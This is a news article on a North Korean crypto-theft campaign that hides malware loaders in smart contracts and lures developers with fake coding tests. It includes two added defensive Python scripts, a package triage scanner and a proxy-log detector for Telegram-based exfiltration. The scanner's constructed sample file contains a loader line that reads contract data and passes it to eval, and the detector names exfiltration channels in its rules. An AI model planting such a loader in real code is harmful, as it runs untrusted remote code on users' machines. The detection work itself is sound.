A New Twist: Malware Stashed Inside the Blockchain
For years, hackers have found creative ways to spread malware, but North Korean cybercriminals have now upped the ante. According to the Google Threat Intelligence Group (GTIG), since February 2025, these attackers have started embedding malicious software directly into public blockchains—the decentralized backbone behind cryptocurrencies.
Researchers have named the attack EtherHiding, since the hackers mainly use the Ethereum blockchain (although they also use Binance Smart Chain). Instead of relying on traditional servers—which are relatively easy for authorities to block—the hackers slip harmful code into so-called “smart contracts” on these blockchain networks.
Smart contracts are essentially automated programs that can execute various actions directly on a blockchain. They’re central to the functioning of decentralized finance (DeFi) platforms, managing everything from transfers between blockchains to handling users’ deposited cryptocurrencies.
Because the blockchain is public and accessible to everyone, all it takes for a hacker is to create a smart contract, insert the malware code as if it were a simple piece of data, and deploy the contract. The real kicker? The malicious code inside these smart contracts can be updated at any time—one identified contract was changed more than 20 times in just the first four months, according to Google.
Why the Blockchain Makes Hackers Untouchable
Once that malicious code is uploaded to the blockchain, there’s no way to delete it. Blockchains are designed to resist censorship, and that resilience is now being weaponized. Cybercriminals are essentially using the blockchain as their own digital fortress.
This unconventional tactic is currently being used as part of an ongoing crypto theft campaign.
“This development marks an escalation in the threat landscape: state-backed actors are now leveraging unprecedented techniques to distribute malware that’s hard for law enforcement to neutralize and easy to adapt to new campaigns,” explains Robert Wallace, one of Google’s lead researchers on the case.
The Trap: Fake Job Offers and Skill Tests
The operation kicks off with phony job offers for software developers. Posing as newly launched crypto startups, the hackers build credible-looking profiles on professional networking sites and job boards—even inventing entire companies to lure their targets. Once a developer takes the bait, they’re invited to a remote interview.
During the interview, the hopeful candidate is asked to complete a coding test, which involves running a provided script or program on their computer. At this point, the trap snaps shut. The initial script triggers the download of another script that’s cleverly hidden inside a smart contract on a blockchain.
The malware known as JADESNOW then springs into action, fetched straight from the blockchain. Its only job? To grab and launch the main malicious payload: a spyware named InvisibleFerret.
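The infection chain above starts with a developer running a “coding test” package that quietly reads a payload out of a smart contract and executes it. The script below is an added example written for this article, not code from Google’s report or from any of the tools it names: it is a read-only triage pass a reviewer can run over a received package before executing anything, scoring each file on the combination the article describes (a public-chain read such as a JSON-RPC `eth_call`, dynamic execution of fetched data, a base64 decode stage, and a Telegram bot endpoint). The rule set, the scoring thresholds and the two sample files are constructed for the demonstration; the contract address and selector in the sample are placeholders.

```python
"""Pre-execution triage for a 'take-home coding test' package.

Added example, not code from the article or the GTIG report.  Flags source
files that combine (a) a read from a public blockchain (JSON-RPC eth_call /
contract storage reads) with (b) dynamic execution of fetched data, which is
the loader shape the article describes, and separately notes a Telegram bot
channel.  Rules, thresholds and sample files are constructed for this example.
"""
import re
from dataclasses import dataclass, field
from pathlib import Path

# Indicator name -> regex.  Heuristic, meant for triage before anyone runs the code.
RULES = {
    "chain_read":   re.compile(r"\beth_call\b|\beth_getStorageAt\b|\.call\(\s*\{", re.I),
    "json_rpc":     re.compile(r'"jsonrpc"\s*:\s*"2\.0"', re.I),
    "dynamic_exec": re.compile(r"\b(?:eval|exec|Function)\s*\(|\bchild_process\b|\bsubprocess\b"),
    "decode_stage": re.compile(r"\batob\s*\(|\bb64decode\s*\(|from\([^)]*['\"]base64['\"]\)"),
    "telegram_bot": re.compile(r"api\.telegram\.org/bot", re.I),
}


@dataclass
class Finding:
    path: str
    hits: dict[str, int] = field(default_factory=dict)

    @property
    def verdict(self) -> str:
        # A contract read feeding eval/exec is the loader pattern itself: block, do not run.
        if "chain_read" in self.hits and "dynamic_exec" in self.hits:
            return "BLOCK"
        return "REVIEW" if len(self.hits) >= 2 else "OK"


def scan_text(path: str, text: str) -> Finding:
    """Count rule matches in one file's contents; keep only rules that fired."""
    counts = {name: len(rx.findall(text)) for name, rx in RULES.items()}
    return Finding(path, {k: v for k, v in counts.items() if v})


def scan_package(files: dict[str, str]) -> list[Finding]:
    """Scan an in-memory package {relative path: contents}; worst verdict first."""
    order = {"BLOCK": 0, "REVIEW": 1, "OK": 2}
    return sorted((scan_text(p, t) for p, t in files.items()),
                  key=lambda f: order[f.verdict])


def scan_directory(root: str, suffixes=(".js", ".ts", ".py", ".json")) -> list[Finding]:
    """Same scan over a checked-out package on disk.  Read-only: nothing is executed."""
    files = {str(p.relative_to(root)): p.read_text(errors="ignore")
             for p in Path(root).rglob("*") if p.is_file() and p.suffix in suffixes}
    return scan_package(files)


# Constructed sample package: one ordinary helper and one file with the loader shape.
# The contract address and selector are placeholders, not real values.
SAMPLE_PACKAGE = {
    "src/utils.js": "export async function getUser(id) {\n"
                    "  const r = await fetch(`https://api.example.com/users/${id}`);\n"
                    "  return r.json();\n}\n",
    "scripts/setup.js": "const body = {\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"eth_call\",\n"
                        "  \"params\":[{\"to\":\"0x<CONTRACT-PLACEHOLDER>\",\"data\":\"0x<SELECTOR>\"},\"latest\"]};\n"
                        "fetch(RPC_URL, {method:\"POST\", body: JSON.stringify(body)})\n"
                        "  .then(r => r.json()).then(j => eval(atob(j.result)));\n",
}

if __name__ == "__main__":
    for f in scan_package(SAMPLE_PACKAGE):
        print(f"{f.verdict:6} {f.path}  {f.hits}")
```

Run against the constructed package, `scripts/setup.js` comes back `BLOCK` (chain read plus `eval`), while `src/utils.js` is `OK`. The point of the heuristic is the pairing: a blockchain read on its own is normal in a crypto codebase, and an `eval` on its own is merely sloppy, but the two together on data that just came off a public chain is exactly the updatable remote loader the article warns about.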
InvisibleFerret: The Digital Pickpocket
Once activated, InvisibleFerret quietly begins monitoring everything on the victim’s computer. It rifles through all installed browsers searching for saved passwords, stored login data, email addresses, and even any bank card information that’s been saved. But its prime target is cryptocurrency wallets, especially those managed via browser extensions like MetaMask or Phantom.
- InvisibleFerret sifts through the computer’s files, seeking out the private keys needed to access crypto wallets.
- When it finds valuable data, the malware compiles it into a ZIP archive.
- The pilfered archive is then whisked away—usually via Telegram (either a bot or private channel), or occasionally via a remote server—straight to the hackers, who can then empty the developer’s crypto wallets.
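The last step of that chain, an archive leaving the machine over the Telegram Bot API or a plain remote server, is the part a network defender can see. The script below is an added example, not code from the article or from Google: it parses web-proxy log lines in a constructed format (timestamp, client, method, URL, status, bytes sent, content type) and raises an alert for any upload to `api.telegram.org/bot…`, which is rarely expected from a developer workstation, and for large archive uploads to hosts outside an allowlist. The allowlist, the 1 MiB threshold and the log lines are assumptions for the demonstration; the bot token in the sample is a placeholder and is redacted before it reaches an alert.

```python
"""Proxy-log check for the exfiltration channel described above.

Added example, not from the article.  The log format, the allowlist, the size
threshold and the sample lines are constructed for this demonstration.
"""
import re
from dataclasses import dataclass

# Constructed line format: ts client METHOD url status bytes_sent "content-type"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) (?P<bytes_out>\d+) "(?P<ctype>[^"]*)"$'
)
TELEGRAM_BOT = re.compile(r"^https?://api\.telegram\.org/bot([^/]+)/", re.I)
ALLOWED_UPLOAD_HOSTS = {"api.github.com", "registry.npmjs.org", "pypi.org"}  # assumed
ARCHIVE_TYPES = ("application/zip", "application/octet-stream", "multipart/form-data")
LARGE_UPLOAD = 1 * 1024 * 1024  # 1 MiB; assumed threshold, tune per fleet


@dataclass
class Alert:
    ts: str
    client: str
    rule: str
    url: str
    bytes_out: int


def host_of(url: str) -> str:
    return re.sub(r"^https?://", "", url).split("/")[0].lower()


def redact(url: str) -> str:
    """Never copy a live bot token into a ticket or SIEM field."""
    m = TELEGRAM_BOT.match(url)
    return url.replace(m.group(1), "<redacted>") if m else url


def check_line(line: str):
    m = LOG_RE.match(line.strip())
    if not m:
        return None  # unparsable line: skip rather than guess
    f = m.groupdict()
    out = int(f["bytes_out"])
    if TELEGRAM_BOT.match(f["url"]):
        return Alert(f["ts"], f["client"], "telegram_bot_api", redact(f["url"]), out)
    if (f["method"] == "POST" and out >= LARGE_UPLOAD
            and host_of(f["url"]) not in ALLOWED_UPLOAD_HOSTS
            and f["ctype"].startswith(ARCHIVE_TYPES)):
        return Alert(f["ts"], f["client"], "large_archive_upload", f["url"], out)
    return None


def scan_log(lines) -> list[Alert]:
    return [a for a in map(check_line, lines) if a]


# Constructed sample: two benign lines, one Telegram bot upload, one archive upload to a
# non-allowlisted host (203.0.113.10 is a documentation address), one malformed line.
SAMPLE_LOG = [
    '2025-02-14T10:01:02Z dev-laptop-07 POST https://api.telegram.org/bot<TOKEN-PLACEHOLDER>/sendDocument 200 48213912 "multipart/form-data"',
    '2025-02-14T10:01:10Z dev-laptop-07 GET https://api.github.com/repos/example/repo 200 512 "application/json"',
    '2025-02-14T10:02:00Z dev-laptop-12 POST https://203.0.113.10/upload 200 9100000 "application/zip"',
    '2025-02-14T10:03:00Z dev-laptop-03 POST https://registry.npmjs.org/-/package/x 201 5242880 "application/octet-stream"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a.rule:22} {a.client:14} {a.bytes_out:>10} B  {a.url}")
```

On the sample, the Telegram line and the 9 MB zip upload to the unlisted host are alerted; the npm publish is large but allowlisted, and the GitHub GET is neither. The Telegram rule fires regardless of size or method because the channel itself is the signal: bot uploads from a workstation are rare enough that the volume threshold would only add noise.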
That’s the entire point of the operation: to steal digital assets and leave little trace behind.
Behind the Screens: North Korea’s High-Profile Hacking Gang
Orchestrating this large-scale scheme is a North Korean state-backed hacker group known under the code name UNC5342. This seasoned crew specializes in cryptocurrency theft, and if you needed a reminder, Kim Jong Un’s hackers consistently rank among the most dangerous threats in the crypto ecosystem.
So far this year, North Korean cybercriminals have already stolen the equivalent of $2 billion in digital assets. And if that sounds familiar, the infamous Lazarus Group—one of their peers—was behind the largest crypto hack in history when they took down the Bybit exchange back in February.
Let’s just say the cyber underworld of Pyongyang isn’t running out of dangerous ideas any time soon.